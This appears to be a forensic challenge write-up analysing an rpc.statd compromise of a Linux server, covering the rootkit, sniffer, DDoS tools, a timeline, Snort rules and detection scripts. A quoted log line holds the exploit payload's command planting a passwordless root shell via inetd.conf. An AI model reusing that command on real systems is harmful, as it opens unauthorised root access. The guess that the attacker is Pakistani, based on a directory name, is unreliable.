By Royans K Tharakan <rkt(at)pobox.com>

http://security.royans.net/

 

 

Date: 11 Feb 2000

 

 

Contents:

 

Section 1: Identify the intrusion method, its date, and time. (Assume the clock on the IDS was synchronized with an NTP reference time source.)

Section 2: Identify as much as possible about the intruder(s).

Section 3: Was there a "rootkit" or other post-concealment Trojan horse programs installed on the system? If so, what operating system programs were replaced and how could you get around them?

Section 4: Was there a sniffer or password-harvesting program installed? If so, where and what files are associated with it?

Section 5: List all the files that were added/modified by the intruder. Provide an analysis of these programs

Section 6: What is publicly known about the source of any programs found on the system?

Section 7: Build a time line of events and provide a detailed analysis of activity on the system, noting sources of supporting or confirming evidence

Section 8:  Provide a report suitable for management or news media

Section 9:  Provide an advisory for use within the home organization (a fictitious university, "honeyp.edu", in this case, where I hold an honorary Doctorate, by the way) to explain the key aspects of the vulnerability exploited, how to detect and defend against this vulnerability, and how to determine if other systems were similarly compromised.

Section 10:  Produce a cost-estimate for this incident using the following guidelines and method:

 

 

 

 

Section 1: Identify the intrusion method, its date, and time. (Assume the clock on the IDS was synchronized with an NTP reference time source.)

 

The attack looks like the statd exploit by ron1n. However, the time of attack given by the Honeynet Project could be disputed: the /var/log/messages file recovered from the disk indicates that the attack took place at around "Nov 8 00:09:00" instead of "Nov 7 23:11:51" as stated on the website. Of course, this could also mean that the two machines were in different time zones: if the Red Hat box was at CST (-0600), then the Snort sensor was running at -0700.

 

Nov  8 00:08:41 apollo inetd[408]: pid 2077: exit status 1

Nov  8 00:08:41 apollo inetd[408]: pid 2078: exit status 1

Nov  8 00:09:00 apollo rpc.statd[270]: SM_MON request for hostname containing '/': ^D...^D...^E...^E...^F...^F...^G...^G...08049f10 bffff754 000028f8 4d5f4d5

 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f 000000000000000000000000000000000000000000000000000000000000000000

0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

000000000bffff70400000000000000000000000000000000000000000000000bffff7050000bffff7060000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000bffff707.......................................

...........K^.v... .^(.. .^... .^... .. ..#.^.1... .F'.F*.. .F..F..+, ...N..V...1...@......./bin/sh -c echo 4545 stream tcp nowait root /bin/sh sh -i >> /etc

inetd.conf;killall -HUP inetd

Nov  8 04:02:00 apollo anacron[2159]: Updated timestamp for job `cron.daily' to 2000-11-08

 

 

The attacker appended an entry to /etc/inetd.conf and restarted inetd. The new entry let the attacker log in as root, without a password, to a /bin/sh bound on port 4545.

 

 

 

 

Section 2: Identify as much as possible about the intruder(s).

 

Probably from a machine in Texas. However, the attacker uses a directory name "paki", which is not a particularly common word, so it is quite possible that the real attackers started out from somewhere in Pakistan.

 

216.216.74.2 = ATHM-216-216-xxx-2.home.net :  This is probably a rooted box on a cable network

 

Advanced Commerce Systems (NETBLK-ATWORK-WI33381)

   5910 N. Central Expressway, Suite 1040

   Dallas, TX 75206

   US

 

   Netname: ATWORK-WI33381

   Netblock: 216.216.74.0 - 216.216.74.15

 

   Coordinator:

      Anderson, Michael J.  (MJA-ARIN)  mianders@ADVANCEDCOMMERCE.COM

      214-891-6306

 

   Record last updated on 26-Jul-1999.

   Database last updated on 6-Feb-2001 18:34:51 EDT.

 

 

 

Section 3: Was there a "rootkit" or other post-concealment trojan horse programs installed on the system? If so, what operating system programs were replaced and how could you get around them?

 

Though I have not been able to find out exactly which rootkit was used, I can provide a brief analysis of what was replaced.

The kit used has a resemblance to lrk and ark. I believe it's closer to lrk.

 

Files Replaced – backdoored (to hide presence)

/bin/ps, /usr/bin/top, /usr/sbin/syslogd, /bin/ls , /sbin/ifconfig, /bin/netstat, /usr/sbin/tcpd, /usr/sbin/in.identd, /usr/sbin/in.ftpd

 

Packages Added – mostly to patch holes.

Wuftp, lpd, amd (auto mounter), named

 

Other files modified/replaced during attack:

Nov 08 00 06:56:59    17968 ..c -rwx------ root     root     /bin/ping

                      45388 ..c -rwx------ root     tty      /sbin/dump

                      67788 ..c -rwx------ root     tty      /sbin/restore

                      33288 ..c -rwx------ root     root     /usr/bin/at

                      35168 ..c -rwx------ root     root     /usr/bin/chage

                      36756 ..c -rwx------ root     root     /usr/bin/gpasswd

                       5640 ..c -rwx------ root     root     /usr/bin/newgrp

                     531516 ..c -rwx------ root     root     /usr/bin/sperl5.00503

                     531516 ..c -rwx------ root     root     /usr/bin/suidperl

                      34751 ..c -rwx------ root     root     /usr/libexec/pt_chown

                      16488 ..c -rwx------ root     bin      /usr/sbin/traceroute

                       5896 ..c -rwx------ root     root     /usr/sbin/usernetctl

 

Config files involved - /dev/ptyp, /usr/man/.a , /usr/man/.p , /usr/man/p , /usr/man/q, /usr/man/r

 

 

 

Section 4: Was there a sniffer or password harvesting program installed? If so, where and what files are associated with it?

 

The sniffer used is "linsniffer" by Mike Edulla (medulla@infosoc.com). The file "tcp.log" in /usr/man/.Ci could originally have been part of it.

The real log file, however, was /var/tmp/nap.

The following executable shell script is also part of this distribution; it does some cleanup to remove old nap logs:

/usr/man/.Ci/ /Anap

 

Look at the Appendix for source code of this sniffer.

 

 

Section 5: List all the files that were added/modified by the intruder. Provide an analysis of these programs

 

Filename | Apparent Author | Description
------------------------------------------------------------------------------------
/dev/ptyp | Author of Rootkit | Text file listing what must stay invisible to "ps" and "top"
/usr/libexec/awk/addy.awk | /usr/man/.Ci/addn | /usr/man/.Ci/addn writes to this; looks like an mstream config file?
/usr/man/.Ci/a.sh | Attacker | makes sure the rpc services are gone
/usr/man/.Ci/addn | Author of Rootkit | some DDoS tool
/usr/man/.Ci/backup/ | Author of Rootkit | where the real (original) binaries are kept
/usr/man/.Ci/bx | Attacker | looks like BitchX
/usr/man/.Ci/chmod-it | Author of Rootkit | fixes permissions on newly installed binaries
/usr/man/.Ci/clean | Attacker | uses "snap" to clean the log files
/usr/man/.Ci/do | Attacker | cleans up the passwd/shadow files: removes the "own" and "adm1" accounts (one is a root account, the other a user account)
/usr/man/.Ci/find | Author of Rootkit | backdoored find
/usr/man/.Ci/inetd | Author of Rootkit | backdoored inetd
/usr/man/.Ci/killall | Author of Rootkit | backdoored killall
/usr/man/.Ci/needz | Attacker | installs pico and screen, for putting the bot in the background
/usr/man/.Ci/paki/slice | Not Known | SYN flooder source code with spoofed source address
/usr/man/.Ci/paki/stream.c | Not Known | another SYN flooder
/usr/man/.Ci/pstree | Author of Rootkit | "fixed" pstree
/usr/man/.Ci/q | Mixter | remote client and server control for Q by Mixter
/usr/man/.Ci/qs | Mixter | remote client and server control for Q by Mixter
/usr/man/.Ci/rmS | Attacker | cleans up a few installation files
/usr/man/.Ci/scan/amd/a.sh | Attacker | scans the class B network 206.110.0.0/16 for port 111
/usr/man/.Ci/scan/amd/ben.c | ryan@junker.org | gets the RPC program ID from an rpc server
/usr/man/.Ci/scan/amd/amdx | Ron1n | statd exploit
/usr/man/.Ci/scan/amd/pscan | Unknown | looks for one specific open port across a class B/C network; not a generic port scanner but one for a given port, e.g. for finding rpc ports (code excerpt below)
/usr/man/.Ci/scan/bind/ibind.sh | Not Known | looks for bind holes and makes a list of the different kinds of holes (script excerpt below)
/usr/man/.Ci/scan/daemon/lscan2.c | Mixter | a generic scanner to look for systems running bind(53), pop(110), pop2(109), imap(143) or ftp(21)
/usr/man/.Ci/scan/daemon/z0ne | Unknown | a DDoS tool; I'm not exactly sure of what type
/usr/man/.Ci/scan/fs | Author of Rootkit |
/usr/man/.Ci/scan/port/strobe | *Proff* (proff@suburbia.apana.org.au) | scanner
/usr/man/.Ci/scan/statd/classb | Attacker |
/usr/man/.Ci/scan/statd/r | Unknown | rpc port scanner
/usr/man/.Ci/scan/statd/statdx | Unknown | exploit for statd
/usr/man/.Ci/scan/wu | Unknown | scans for rpc/ttdbserver/wingate
/usr/man/.Ci/scan/x/pscan | Unknown | scanner
/usr/man/.Ci/scan/x/x | Unknown | exploit for X
/usr/man/.Ci/scan/x/xfil | Unknown |
/usr/man/.Ci/scan/x/xscan | Attacker | scans for X servers
/usr/man/.Ci/snap | Attacker | called by clean to clean up the log files
/usr/man/.Ci/sniff | Mike Edulla medulla@infosoc.com | the "linsniffer" sniffer
/usr/man/.Ci/sp.pl | Attacker |
/usr/man/.Ci/syslogd | Author of Rootkit |
/usr/man/.a | Attacker | contains some IPs; might be used by some package to hide these connections
/usr/man/.p | Attacker | same as /dev/ptyp, only smaller in size
/usr/man/p | Attacker | same as /usr/man/.p
/usr/man/r | Attacker | purpose unknown; looks similar
/var/tmp/nap |  | password sniffing log generated by snif
/usr/man/.Ci/ /Anap | Attacker | "Anti nap"? Removes the nap log; probably triggered by one of the programs to clean up nap, just in case
/usr/bin/pawd | Author of Rootkit | purpose unknown
/tmp/.bash_history -> /dev/null |  | probably part of the "own"/"adm1" account setup
/root/.bash_history -> /dev/null |  | hides the history of root's actions on the box
/usr/man/.Ci/fix | Author of Rootkit | trojans the real files and uses the backup to keep functionality
/usr/games/.bash_history -> /dev/null |  | hides the history of root's actions on the box
/bin/ps | Author of Rootkit |
/usr/bin/top | Author of Rootkit |
/usr/sbin/syslogd | Author of Rootkit |
Backup | Author of Rootkit |
/sbin/ifconfig | Author of Rootkit |
/bin/netstat | Author of Rootkit |
/usr/sbin/tcpd | Author of Rootkit |
/usr/sbin/in.identd | Author of Rootkit |
/usr/sbin/in.ftpd | Author of Rootkit |

Code excerpts referenced in the table:

/usr/man/.Ci/scan/amd/pscan

Usage string: "Usage: %s <b-block> <port> [c-block]\n", argv[0]

Relevant code:

               connlist[i].addr.sin_addr.s_addr = inet_addr(ip);
               if (connlist[i].addr.sin_addr.s_addr == -1)
                 fatal("Invalid IP.");
               connlist[i].addr.sin_family = AF_INET;
               connlist[i].addr.sin_port = htons(atoi(argv[2]));
               connlist[i].a = time(0);
               connlist[i].status = S_CONNECTING;

/usr/man/.Ci/scan/bind/ibind.sh

Usage string: echo "Usage: ./ibind.sh <b or c class>"

This section does a dig request for bind version info:
---------
for i in `cat $FILE`; do
        dig version.bind @$i chaos txt >> $OUT 2>/dev/null &
done

This section catalogs the results:
---------
cat $OUT|grep -v ";;" >> $VULN1
cat $VULN1|grep -v "server" >> $VULN2
cat $VULN2|grep -v "@0" >> $VULN3
cat $VULN3|grep -v "@3" >> $VULN4
cat $VULN4|grep -v "@4" >> $VULN5
cat $VULN5|grep -v "@-" >> $VULN6
cat $VULN6|grep -v "@sec" >> $VULN7
cat $VULN7|grep -v "@Scan" >> $VULN8
cat $VULN8|grep -v "@completed" >> $VULN9
cat $VULN9|grep -v "8.2.2-P" >> $VULN10

 

 

 

Section 6: What is publicly known about the source of any programs found on the system?

 

Mixter – lscan2.c, q, qs

Ron1n – amdx (the statd exploit used)

Proff – strobe

Mike Edulla – linsniffer

ryan@junker.org – ben.c

 

 

Section 7: Build a time line of events and provide a detailed analysis of activity on the system, noting sources of supporting or confirming evidence

 

Nov  8: 00:09:00

 

The attack looks like the statd exploit by ron1n. The rpc.statd SM_MON entry recovered from /var/log/messages, and the discussion of the time-zone difference between this timestamp and the Honeynet Project's "Nov 7 23:11:51", are given in Section 1.

The attacker appended an entry to /etc/inetd.conf and restarted inetd. The new entry let the attacker log in as root, without a password, to a /bin/sh bound on port 4545.

 

Nov 8: 06:25:53

 

The attacker probably ran an automated attack tool. The first time the attacker logged in was at 06:25 (CST). Among the first few actions the attacker took was the creation of two accounts on the system, "own" and "adm1". These were probably used by the attacker to ssh/telnet back into the system and then gain local root access using su. This modification was later undone by the "do" script.

 

/etc/passwd

own:x:0:0::/root:/bin/bash

adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash

 

/etc/shadow

own::10865:0:99999:7:-1:-1:134538460

adm1:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412

 

 

Nov 8: 06:29:27

Though I cannot confirm this, I feel the attacker at this point did an FTP to an unknown site from where he downloaded the rootkit and other stuff.

 

Nov 08 00 06:29:27    63728 .a. -rwxr-xr-x root     root     /usr/bin/ftp

 

Nov 8: 06:45:18

Someone logged in (probably the attacker using the new account)

Nov 08 00 06:45:18      161 .a. -rw-r--r-- root     root     /etc/hosts.allow

                          0 .a. -rw-r--r-- root     root     /etc/hosts.deny

Nov 08 00 06:45:19       63 .a. -rw-r--r-- root     root     /etc/issue.net

Nov 08 00 06:45:24     1504 .a. -rw-r--r-- root     root     /etc/security/console.perms

 

 

Nov 8: 06:51:53    

The attacker untars and changes the permissions of the tools installed in /usr/man/.Ci:

 

Nov 08 00 06:51:54      714 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/a.sh

                       7229 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/snif

Nov 08 00 06:51:55      698 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/clean

                     147900 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/inetd

 

After installing the tools, the attacker modified and added a few files to the OS. "amd", which looks like the automounter, is installed, and ldconfig is run.

 

Nov 8: 06:52:09

This is probably when the rootkit install script was run. As can be seen from the recovered script (Appendix B), the rootkit installs ssh/ftp/named/lpd and backdoors a lot of binaries with its own versions. ftp/lpd/named were probably updated to fix holes.

 

Nov 08 00 06:55:58      657 m.c -rw-r--r-- root     root     /etc/passwd

                        601 m.c -rw-r--r-- root     root     /etc/shadow

 

Nov 8: 06:54:22

Named installed

Nov 08 00 06:54:22     6416 mac -rwxr-xr-x root     root     /usr/local/bin/addr

 

Nov 8: 06:59:07

Either the intruder himself (though I don't think so) or someone else logged in as "drosen", and /var/tmp/nap got its first password entry.

Nov 08 00 06:59:07     4096 m.c drwx------ drosen   drosen   /home/drosen

 

Nov 8: 07:03:05

Inetd.conf changed and entry for sh on port 4545 removed

Nov 08 00 07:03:05     3027 m.c -rw-r--r-- root     root     /etc/inetd.conf

 

Nov 8: 18:37:30

The admin logged in at this time and found problems. Within two hours the system was brought down for analysis.

 

Nov 08 00 18:37:30    20452 .a. -rwxr-xr-x root     root     /bin/login

                       1262 .a. -rw-r--r-- root     root     /etc/localtime

                        437 .a. -rw-r--r-- root     root     /etc/pam.d/login

 

 

 

 

 

 

Section 8:  Provide a report suitable for management or news media

 

We regret to announce that one of our servers, Apollo, was compromised on November 8th by unknown intruders.

The attackers used a security hole in our "rpc.statd" service to gain access to the server. Later that day the attacker installed a number of tools on the server and put in backdoors to hide the attacker's presence from a normal user of the system. Some of the tools installed indicate that the attacker was attempting to set up a DDoS tool on this server to attack other servers outside. Also found were tools like "BitchX", which would have allowed the attacker to control the server from an IRC channel behind an anonymous nickname.

We have taken precautionary measures and are doing a full-scale, organization-wide search for other signs of compromise. Our preliminary investigation shows that this was the only system compromised and that nothing sensitive was stolen. We have contacted the ISP from which the attack originated and are making an attempt to identify the attackers.

We have upgraded our firewall filters to detect these attacks at the border and have sent a notification to all sysadmins in our organization advising them how to secure their systems so that this does not happen again.

As of 0600 hrs Nov 9th, we have brought Apollo back online for normal use.

 

 

 

Section 9:  Provide an advisory for use within the home organization(a fictitious university, "honeyp.edu", in this case, where I hold an honorary Doctorate, by the way) to explain the key aspects of the vulnerability exploited, how to detect and defend against this vulnerability, and how to determine if other systems were similarly compromised.

 

===============================================================================

Issued by: Security Team, Honeyp.edu

 

Topic: rpc.statd exploit warning advisory

Announced: 11th Feb 2001

OS Affected: All Linux distributions with an unpatched rpc.statd

Solution Available: Yes

Severity: root compromise

===============================================================================

 

I. Abstract

 

We have detected an increase in attacks on Linux-based servers all around the world. Anyone running an unpatched version of RPC (rpc.statd) on Red Hat Linux is open to this attack.

 

II. Anatomy of the Attack

 

In this particular attack the attacker uses a common rpc.statd buffer overflow exploit to gain root. This requires "rpc.statd" to be running on the box. The attacker then modifies inetd.conf and restarts inetd with a shell bound to a port.

The attacker then installs a rootkit (possibly lrk/ark) with password sniffing ability. The rootkit modifies and installs a few critical binaries, including ps, top, syslogd, ls, ifconfig, netstat, tcpd and identd. The attacker also installs his own version of sshd and wuftp.

 

III. Incident Detection

 

If you are running an unpatched version of rpc.statd, then you should start looking for signs of compromise immediately, before you upgrade. Check the MD5 signatures of your binaries. If you suspect any changes, you are recommended to reinstall the OS. A quicker way of checking whether this exact attack was used against you is to check for the existence of "/usr/man/.Ci/backup/ls" by executing it.
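The checks below, an added example that is not part of the original write-up, implement the indicators from Section 1 and from this section in Python: the rpc.statd SM_MON log line and the inetd root-shell command it carries, root-shell entries in /etc/inetd.conf, extra UID-0 or passwordless accounts such as "own", and the rootkit paths from the file list. Function and constant names are my own, and the sample inputs are constructed from the fragments quoted in this write-up, with the statd payload abridged to one line.

```python
"""Indicator checks for the rpc.statd / inetd.conf compromise in this write-up.
Added example (not the original author's code); sample inputs are
constructed from the quoted evidence, with the statd payload abridged."""
import os
import re
import shutil
import tempfile

# Text rpc.statd logs when the exploit payload arrives in an SM_MON request.
STATD_MARKER = "SM_MON request for hostname containing '/'"
# The command carried by the payload: a root shell served by inetd on a port.
INETD_CMD = re.compile(r"(\d+)\s+stream\s+tcp\s+nowait\s+root\s+/bin/sh")
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+(?P<host>\S+)\s+"
    r"(?P<proc>[\w.]+)\[(?P<pid>\d+)\]:\s*(?P<msg>.*)$")
SHELLS = {"sh", "bash", "csh", "ksh", "tcsh", "zsh"}
# Paths from the file list in this write-up that a clean system never has.
ROOTKIT_PATHS = ["/usr/man/.Ci", "/dev/ptyp", "/usr/man/.a", "/usr/man/.p",
                 "/usr/man/p", "/usr/man/q", "/usr/man/r",
                 "/usr/libexec/awk/addy.awk", "/var/tmp/nap", "/usr/bin/pawd"]


def find_statd_exploit_events(syslog_text):
    """(timestamp, host, port) for each rpc.statd line carrying the marker;
    port is the inetd backdoor port named in the payload, or None."""
    events = []
    for line in syslog_text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m or m.group("proc") != "rpc.statd":
            continue
        if STATD_MARKER not in m.group("msg"):
            continue
        cmd = INETD_CMD.search(m.group("msg"))
        events.append((m.group("ts"), m.group("host"),
                       int(cmd.group(1)) if cmd else None))
    return events


def find_inetd_root_shells(inetd_conf):
    """(service, server line) for inetd.conf entries that run a shell as root.
    Fields: service socktype proto wait/nowait user[.group] server [args]."""
    hits = []
    for line in inetd_conf.splitlines():
        f = line.split()
        if len(f) < 6 or f[0].startswith("#"):
            continue
        user = re.split(r"[.:]", f[4])[0]
        if user == "root" and os.path.basename(f[5]) in SHELLS:
            hits.append((f[0], " ".join(f[5:])))
    return hits


def find_suspicious_accounts(passwd_text, shadow_text):
    """Return (UID-0 accounts other than root, accounts with an empty hash)."""
    extra_root, no_password = [], []
    for f in (l.split(":") for l in passwd_text.splitlines()):
        if len(f) >= 7 and f[2] == "0" and f[0] != "root":
            extra_root.append(f[0])
    for f in (l.split(":") for l in shadow_text.splitlines()):
        if len(f) >= 2 and f[1] == "":   # empty field: login without a password
            no_password.append(f[0])
    return extra_root, no_password


def find_rootkit_artifacts(root="/"):
    """Rootkit paths present under root (point it at a read-only mounted image)."""
    return [p for p in ROOTKIT_PATHS
            if os.path.lexists(os.path.join(root, p.lstrip("/")))]


# Constructed samples, abridged from the evidence quoted in this write-up.
SAMPLE_SYSLOG = (
    "Nov  8 00:08:41 apollo inetd[408]: pid 2077: exit status 1\n"
    "Nov  8 00:09:00 apollo rpc.statd[270]: SM_MON request for hostname "
    "containing '/': ^D...^D...08049f10 bffff754 [payload abridged] "
    "/bin/sh -c echo 4545 stream tcp nowait root /bin/sh sh -i "
    ">> /etc/inetd.conf;killall -HUP inetd\n")
SAMPLE_INETD_CONF = (
    "# service socktype proto flags user server args\n"
    "ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a\n"
    "4545 stream tcp nowait root /bin/sh sh -i\n")
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "own:x:0:0::/root:/bin/bash\n"
    "adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash\n")
SAMPLE_SHADOW = (
    "root:$1$constructed$notarealhash000000000000:11266:0:99999:7:::\n"
    "own::10865:0:99999:7:-1:-1:134538460\n"
    "adm1:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412\n")


def demo_artifact_check():
    """Scan a throwaway tree seeded with two of the artifact paths."""
    root = tempfile.mkdtemp()
    try:
        for p in ("/usr/man/.Ci/backup", "/dev/ptyp"):
            full = os.path.join(root, p.lstrip("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            open(full, "w").close()
        return find_rootkit_artifacts(root)
    finally:
        shutil.rmtree(root)
```

Run find_rootkit_artifacts against the mount point of a read-only disk image rather than the live system, since the rootkit's ls hides its own directories.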

 

IV. Detailed File Descriptions

 

The attacker installs a password harvesting program and runs a DDoS toolkit on the server.

 

/dev/ptyp  -- Txt file which has info about stuff which needs to be invisible to "ps" and "top"

/usr/libexec/awk/addy.awk -- usr/man/.Ci/addn writes to this, looks like a mstream configfile ?

/usr/man/.Ci/a.sh  -- makes sure rpc stuff is gone

/usr/man/.Ci/addn -- This is some Ddos Tool

/usr/man/.Ci/backup/ -- this is where the real binaries are...

/usr/man/.Ci/bx -- looks like bitchx

/usr/man/.Ci/chmod-it --  fixes permissions on newly installed binaries

/usr/man/.Ci/clean -- uses "snap" to clean the log files

/usr/man/.Ci/do -- cleans up the passwd/shadow file. removes "own" and "adm1" account.   one of these accounts is a root account, other is a user account

/usr/man/.Ci/find -- Backdoored find

/usr/man/.Ci/inetd -- backdoored inetd

/usr/man/.Ci/killall -- backdoored killall

/usr/man/.Ci/needz -- installs pico and screen for putting bot in the background

/usr/man/.Ci/paki/slice -- Syn Flooder source code with spoofed source address

/usr/man/.Ci/paki/stream.c -- another one

/usr/man/.Ci/pstree -- fixed pstree

/usr/man/.Ci/q -- remote client and server control for Q by Mixter

/usr/man/.Ci/qs -- remote client and server control for Q by Mixter

/usr/man/.Ci/rmS --  clean up few installation files...

/usr/man/.Ci/scan/amd/a.sh -- scans for a class b network 206.110.0.0/16 port 111

/usr/man/.Ci/scan/amd/ben.c -- Gets RPC ID from a rpc server.

/usr/man/.Ci/scan/amd/amdx --  statd exploit 

/usr/man/.Ci/scan/amd/pscan -- looks for one specific open port across a class B/C network. It is not a generic port scanner but one that looks for a specific port, something which can be used for finding rpc ports.

/usr/man/.Ci/scan/bind/ibind.sh --   looks for bind holes and makes a list of different kinds of holes.

/usr/man/.Ci/scan/daemon/lscan2.c -- A generic scanner to look for systems running bind(53), pop(110), pop2(109), imap(143) or ftp(21)

/usr/man/.Ci/scan/daemon/z0ne --  this is a dDos tool. I'm not exactly sure of what type.

/usr/man/.Ci/scan/fs

/usr/man/.Ci/scan/port/strobe  --  scanner  

/usr/man/.Ci/scan/statd/classb

/usr/man/.Ci/scan/statd/r --  rpc port scanner

/usr/man/.Ci/scan/statd/statdx  --  exploit for statd

/usr/man/.Ci/scan/wu --  scans for rpc/ttdbserver/wingate

/usr/man/.Ci/scan/x/pscan --  scanner

/usr/man/.Ci/scan/x/x -- exploit for x

/usr/man/.Ci/scan/x/xfil 

/usr/man/.Ci/scan/x/xscan --  scan for x servers

/usr/man/.Ci/snap --  called by clean to cleanup the log files.

/usr/man/.Ci/sniff -- Mike Edulla medulla@infosoc.com

/usr/man/.Ci/sp.pl

/usr/man/.Ci/syslogd

/usr/man/.a --  This has some IP's might be used by some package to hide these connections

/usr/man/.p -- same as /dev/ptyp, only smaller in size

/usr/man/p -- same as /usr/man/.p

/usr/man/r -- purpose unknown; looks similar

/var/tmp/nap -- Password sniffing log generated by snif

/usr/man/.Ci/ /Anap -- "Anti nap"? Removes the nap log; probably triggered by one of the programs to clean up nap, just in case

/usr/bin/pawd --    What does this do ??

/tmp/.bash_history -> /dev/null --   This was probably part of the "own"/"adm1" account

/root/.bash_history -> /dev/null --    This was to hide logs of root's action on the box

/usr/man/.Ci/fix -- This trojans the real files and uses the backup to keep functionality.

/usr/games/.bash_history -> /dev/null --   This was to hide logs of root's action on the box

 

IV. Incident Recovery

 

Though the recommended way of recovery is a full reinstall, you could clean up the system in other ways too, provided this was the only instance of root compromise on your system.

 

cd /usr/man/.Ci/backup

cp ps /bin/ps

cp top /usr/bin

cp syslogd /usr/sbin/syslogd

cp ls /bin/ls

cp ifconfig /sbin/ifconfig

cp netstat /bin/netstat

cp tcpd /usr/sbin/tcpd

cp in.identd /usr/sbin

rm -r -f /usr/man/.Ci

rm /bin/bx

rm /usr/sbin/sshd

rm /usr/local/sbin/sshd

rm /dev/ptyp

rm /usr/man/.a

rm /usr/man/.p

rm /usr/man/q

rm /usr/man/r

rm /usr/libexec/awk/addy.awk

rm /usr/bin/screen

rm /usr/bin/telnet

rm /etc/skel/.screenrc

rm /bin/ping

rm /sbin/dump

rm /sbin/restore

rm /usr/bin/at

rm /usr/bin/chage

rm /usr/bin/gpasswd

rm /usr/bin/newgrp

rm /usr/bin/sperl5.00503

rm /usr/bin/suidperl

rm /usr/libexec/pt_chown

rm /usr/sbin/traceroute

rm /usr/sbin/usernetctl

 

 

Note: your system might be unusable until you install ssh and telnet all over again. Contact your vendor for the latest set of binaries.

 

V Files Modified

 

Primary Rootkit files

            /bin/ps

            /usr/bin/top

            /usr/sbin/syslogd

            /sbin/ifconfig

            /bin/netstat

            /usr/sbin/tcpd

            /usr/sbin/in.identd

            /usr/sbin/in.ftpd

           

Others modified/replaced

/bin/ping

/sbin/dump

/sbin/restore

/usr/bin/at

/usr/bin/chage

/usr/bin/gpasswd

/usr/bin/newgrp

/usr/bin/sperl5.00503

/usr/bin/suidperl

/usr/libexec/pt_chown

/usr/sbin/traceroute

/usr/sbin/usernetctl

 

VI Rootkit Details

 

Files Modified: /bin/ps, /usr/bin/top, /usr/sbin/syslogd, /bin/ls , /sbin/ifconfig, /bin/netstat, /usr/sbin/tcpd, /usr/sbin/in.identd, /usr/sbin/in.ftpd

Config files involved: /dev/ptyp, /usr/man/.a, /usr/man/.p, /usr/man/p, /usr/man/q, /usr/man/r

 

VII Detection

 

We recommend installation of snort http://www.snort.org for detection of rpc scan activity.

 

Snort detects the statdx exploit traffic with the following rule:

            alert TCP $EXTERNAL any -> $INTERNAL any (msg: "IDS442/rpc-statdx-exploit"; flags: AP; content: "/bin|c74604|/sh";)

            Also look at http://whitehats.com/info/IDS442

 

Port scanning should always be looked at with suspicion:

alert TCP $EXTERNAL any -> $INTERNAL any (msg: "IDS441/probe-Synscan-Portscan"; id: 39426; flags: SF;)
Also look at http://whitehats.com/info/IDS441
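The content: field of the IDS442 rule uses Snort's mixed text/hex syntax. The following is an added example (not from the advisory or from Snort itself) that decodes such a pattern and checks it against constructed payload bytes, showing why the rule fires on the shellcode fragment but not on every packet that merely contains the text "/bin/sh"; function names are my own.

```python
"""Decode a Snort `content:` pattern and test it against payload bytes.
Added example, not part of the original advisory.  Snort content syntax
mixes literal text with |hex| sections, so "/bin|c74604|/sh" from the
IDS442 rule means "/bin", the bytes c7 46 04, then "/sh".  The sample
payloads below are constructed."""
import re

# content: "..." inside a rule body; backslash escapes allowed in the text
CONTENT_RE = re.compile(r'content:\s*"((?:[^"\\]|\\.)*)"')


def decode_snort_content(content):
    """Translate Snort content syntax into bytes: text outside the pipes is
    literal (backslash escapes removed), text between pipes is hex bytes."""
    parts = content.split("|")
    if len(parts) % 2 == 0:
        raise ValueError("unbalanced '|' in content: %r" % content)
    out = bytearray()
    for i, part in enumerate(parts):
        if i % 2:
            out += bytes.fromhex(part)          # hex section, spaces allowed
        else:
            out += re.sub(r"\\(.)", r"\1", part).encode("latin-1")
    return bytes(out)


def rule_contents(rule):
    """All content: patterns of a rule, decoded to bytes."""
    return [decode_snort_content(c) for c in CONTENT_RE.findall(rule)]


def rule_matches_payload(rule, payload):
    """True when the rule has content: patterns and every one occurs in the
    payload (header fields and TCP flags are not evaluated here)."""
    patterns = rule_contents(rule)
    return bool(patterns) and all(p in payload for p in patterns)


IDS442_RULE = ('alert TCP $EXTERNAL any -> $INTERNAL any '
               '(msg: "IDS442/rpc-statdx-exploit"; flags: AP; '
               'content: "/bin|c74604|/sh";)')
IDS441_RULE = ('alert TCP $EXTERNAL any -> $INTERNAL any '
               '(msg: "IDS441/probe-Synscan-Portscan"; id: 39426; flags: SF;)')

# Constructed payloads: one containing the shellcode fragment the rule keys
# on, one where "/bin/sh" appears only as plain text.
SHELLCODE_SAMPLE = (b"\x90" * 16 + b"/bin\xc7\x46\x04/sh\x00" +
                    b"-c echo 4545 stream tcp nowait root /bin/sh sh -i")
PLAIN_TEXT_SAMPLE = b"GET /cgi-bin/sh?cmd=/bin/sh HTTP/1.0\r\n\r\n"
```

The IDS441 portscan rule has no content: field at all, so this matcher reports no match for it; that rule depends on the TCP flags and IP id, which a payload-only check cannot evaluate.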

 

chkrootkit is a nice tool which lets you run automated rootkit scans on your servers.

            More info is available at http://www.chkrootkit.org/

 

Use file integrity (checksum) checking tools like Tripwire and fcheck to regularly look for problems.

            More info at http://www.tripwire.com

            And at http://freshmeat.net/projects/fcheck/

 

VIII. Incident Reporting

 

If your system is already compromised, and the server is not critical, we request that you let us know so that we can investigate the incident further.

 

IX Recommendations

 

It is possible that your system is wide open to other attacks too. Patch your system immediately with the latest set of OS patches. Remove all services not required from inetd. Mount root and /usr as "read-only" if possible. And keep a lookout for trouble.

 

 

 

Section 10:  Produce a cost-estimate for this incident using the following guidelines and method:

 

Experience in sysadmin:

        2 years on Solaris, 5 on other Unix/Linux.

        I've done enough programming to learn something new pretty fast.

        I use perl/shell/php regularly for my regular stuff.

        I am a security-aware admin, and I am hooked on BugTraq

        and other incident lists.

 

Effort put in: I must have put an estimated 40 hours into this investigation.

